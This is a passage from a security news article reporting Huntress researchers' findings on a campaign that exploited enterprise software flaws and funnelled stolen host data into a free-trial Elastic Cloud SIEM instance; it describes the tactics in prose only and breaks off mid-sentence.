Threat Actor Exploits Flaws and Uses Elastic Cloud SIEM to Manage Stol
Threat Actor Exploits Flaws and Uses Elastic Cloud SIEM to Manage Stol
https://www.infosecurity-magazine.com/news/elastic-cloud-siem-manage-stolen/
Publish Date: 2026-03-09 11:45:00
Source Domain: www.infosecurity-magazine.com
A campaign exploiting multiple software vulnerabilities to steal system data and store it in a cloud-based security platform has been uncovered by cybersecurity researchers.
Investigators found that a threat actor used a free-trial instance of Elastic Cloud’s security information and event management (SIEM) platform to collect and analyse data from compromised systems across dozens of organisations.
The activity was discovered by researchers at Huntress, who observed attackers exploiting flaws in widely used enterprise software, including SolarWinds Web Help Desk.
Instead of using traditional command-and-control (C2) infrastructure, the attacker exfiltrated victim data directly into an attacker-controlled instance of Elastic Cloud, effectively turning a legitimate security monitoring tool into a repository for stolen information.
Elastic Trial as Data Hub and VPN Infrastructure
According to the investigation, the attacker deployed an encoded PowerShell command on compromised systems that gathered detailed host information. The script collected operating system details, hardware specifications, Active Directory data and installed patch information before transmitting it to an ElasticSearch index named “systeminfo”.
Researchers said the tactic allowed the operator to triage victims and prioritise targets using SIEM tools designed for defensive security monitoring.
The Elastic Cloud deployment was created on January 28, 2026, and remained active for several days. Telemetry showed the operator repeatedly interacting with the environment through the Kibana interface, logging hundreds of actions while examining incoming victim data.
Read more on cybersecurity threat intelligence: AI-Driven Insider Risk Now a “Critical Business Threat,” Report Warns
Further analysis revealed that the trial account was registered using a disposable email address linked to the domain quieresmail.com. Investigators believe the address format is tied to the Russian-registered…
